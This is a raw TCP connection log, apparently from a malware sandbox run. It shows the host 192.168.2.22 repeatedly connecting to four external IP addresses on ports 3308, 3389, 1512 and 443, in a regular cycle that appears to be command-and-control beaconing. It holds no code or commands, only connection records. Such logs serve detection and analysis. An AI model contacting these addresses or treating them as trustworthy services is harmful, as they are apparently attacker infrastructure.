Jan 12, 2021 07:45:07.216262102 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:07.216299057 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:07.328718901 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:07.328761101 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:07.329047918 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.334733963 CET	49341	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:07.377861977 CET	3308	49341	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:07.452282906 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.507281065 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.507464886 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.508641958 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.563723087 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.594873905 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.594918013 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.595042944 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.595088959 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.607920885 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.669187069 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.669564962 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.678740978 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.678786039 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.733439922 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.733725071 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.772993088 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.788943052 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.788980007 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.880112886 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.880165100 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.880397081 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.880445957 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.886101961 CET	49342	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:07.943227053 CET	3389	49342	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:07.998366117 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.051254988 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.051368952 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.052555084 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.105351925 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.112210989 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.112262964 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.112365961 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.112410069 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.124198914 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.178327084 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.178473949 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.184941053 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.185058117 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.237713099 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.237984896 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.277755976 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.290836096 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.396876097 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.396920919 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.397046089 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.401190996 CET	49343	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:08.453896999 CET	1512	49343	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:08.520641088 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.573060989 CET	443	49344	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:08.573156118 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.574428082 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.626492977 CET	443	49344	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:08.641508102 CET	443	49344	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:08.641587019 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.648279905 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.702999115 CET	443	49344	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:08.703078032 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.706813097 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.706990957 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.759094954 CET	443	49344	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:08.759238958 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.811458111 CET	443	49344	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:08.929689884 CET	443	49344	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:08.929727077 CET	443	49344	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:08.929917097 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.932686090 CET	49344	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:08.984894037 CET	443	49344	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:09.046694994 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.090046883 CET	3308	49345	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:09.090197086 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.091506004 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.134577990 CET	3308	49345	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:09.145931959 CET	3308	49345	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:09.145977020 CET	3308	49345	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:09.146043062 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.146085978 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.160300016 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.205276966 CET	3308	49345	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:09.205571890 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.220918894 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.221071005 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.264204979 CET	3308	49345	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:09.264549971 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.307773113 CET	3308	49345	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:09.421488047 CET	3308	49345	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:09.421525955 CET	3308	49345	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:09.421787977 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.427603006 CET	49345	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:09.470644951 CET	3308	49345	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:09.546637058 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.601314068 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.601490021 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.602834940 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.657263041 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.690643072 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.690682888 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.690769911 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.690804958 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.702729940 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.767129898 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.767389059 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.777537107 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.777682066 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.832130909 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.832396030 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.872368097 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.886898041 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.886913061 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.978962898 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.978981018 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:09.979316950 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.979361057 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:09.985280991 CET	49346	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:10.040592909 CET	3389	49346	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:10.108369112 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.161261082 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.161366940 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.162061930 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.214821100 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.222203016 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.222219944 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.222302914 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.240453005 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.294527054 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.294825077 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.304497004 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.304647923 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.357583046 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.357867956 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.393775940 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.410752058 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.511785030 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.511837006 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.511995077 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.517702103 CET	49347	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:10.570641041 CET	1512	49347	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:10.637804031 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:10.689934969 CET	443	49348	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:10.690063000 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:10.691788912 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:10.743547916 CET	443	49348	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:10.758306026 CET	443	49348	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:10.758462906 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:10.773420095 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:10.827560902 CET	443	49348	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:10.827734947 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:10.837775946 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:10.837950945 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:10.889935017 CET	443	49348	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:10.890332937 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:10.942121029 CET	443	49348	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:11.061563015 CET	443	49348	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:11.061608076 CET	443	49348	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:11.061667919 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:11.061723948 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:11.063843012 CET	49348	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:11.115650892 CET	443	49348	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:11.168920040 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.212312937 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.212475061 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.213485956 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.256541967 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.267275095 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.267297029 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.267416000 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.282236099 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.328185081 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.328438997 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.338762045 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.339310884 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.382373095 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.382622004 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.422977924 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.425653934 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.425803900 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.539293051 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.539314985 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.539624929 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.545399904 CET	49349	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:11.588490963 CET	3308	49349	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:11.668153048 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:11.723356009 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:11.723458052 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:11.724961996 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:11.778979063 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:11.807918072 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:11.807936907 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:11.808007956 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:11.821314096 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:11.883471966 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:11.883800030 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:11.894048929 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:11.894162893 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:11.948687077 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:11.948945045 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:11.987835884 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:12.003531933 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:12.003571033 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:12.093570948 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:12.093621016 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:12.093879938 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:12.099726915 CET	49350	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:12.165631056 CET	3389	49350	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:12.215528965 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.268336058 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.268434048 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.269910097 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.322623968 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.330382109 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.330424070 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.330471992 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.330492973 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.348165035 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.402080059 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.402307987 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.419135094 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.419325113 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.472052097 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.472202063 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.509763002 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.525024891 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.629126072 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.629168034 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.629328012 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.633141041 CET	49351	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:12.685858965 CET	1512	49351	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:12.744580984 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:12.796545982 CET	443	49352	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:12.796658039 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:12.798198938 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:12.850039005 CET	443	49352	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:12.865268946 CET	443	49352	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:12.865365028 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:12.879652977 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:12.934035063 CET	443	49352	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:12.934176922 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:12.943612099 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:12.943834066 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:12.995671988 CET	443	49352	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:12.995831013 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:13.047764063 CET	443	49352	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:13.166474104 CET	443	49352	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:13.166516066 CET	443	49352	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:13.166757107 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:13.172487974 CET	49352	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:13.224334002 CET	443	49352	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:13.285613060 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.328871012 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.329011917 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.330193043 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.373198986 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.383691072 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.383759975 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.383795023 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.383830070 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.397629976 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.442552090 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.442730904 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.452752113 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.453087091 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.496258020 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.496556997 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.537174940 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.539657116 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.540091991 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.652496099 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.652550936 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.652733088 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.658772945 CET	49353	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 07:45:13.702028036 CET	3308	49353	80.86.91.27	192.168.2.22
Jan 12, 2021 07:45:13.774302006 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:13.828773022 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:13.828876972 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:13.830333948 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:13.884473085 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:13.901859999 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:13.901932955 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:13.902107954 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:13.902151108 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:13.916289091 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:13.977612972 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:13.977936029 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:13.988373041 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:13.988576889 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:14.043988943 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:14.044277906 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:14.083079100 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:14.098598003 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:14.098660946 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:14.188644886 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:14.188694954 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:14.189028978 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:14.194649935 CET	49354	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 07:45:14.250493050 CET	3389	49354	5.100.228.233	192.168.2.22
Jan 12, 2021 07:45:14.303644896 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.356923103 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.356992006 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.358268976 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.411102057 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.417982101 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.418042898 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.418066025 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.418090105 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.433702946 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.487962008 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.488235950 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.498337984 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.498708010 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.551704884 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.551893950 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.589867115 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.604813099 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.604871035 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.705081940 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.705147028 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.705286980 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.710995913 CET	49355	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 07:45:14.764050961 CET	1512	49355	46.105.131.65	192.168.2.22
Jan 12, 2021 07:45:14.819413900 CET	49356	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:14.871530056 CET	443	49356	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:14.871629953 CET	49356	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:14.873027086 CET	49356	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:14.924971104 CET	443	49356	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:14.940088987 CET	443	49356	77.220.64.37	192.168.2.22
Jan 12, 2021 07:45:14.940274954 CET	49356	443	192.168.2.22	77.220.64.37
Jan 12, 2021 07:45:14.957376003 CET	49356	443	192.168.2.22	77.220.64.37
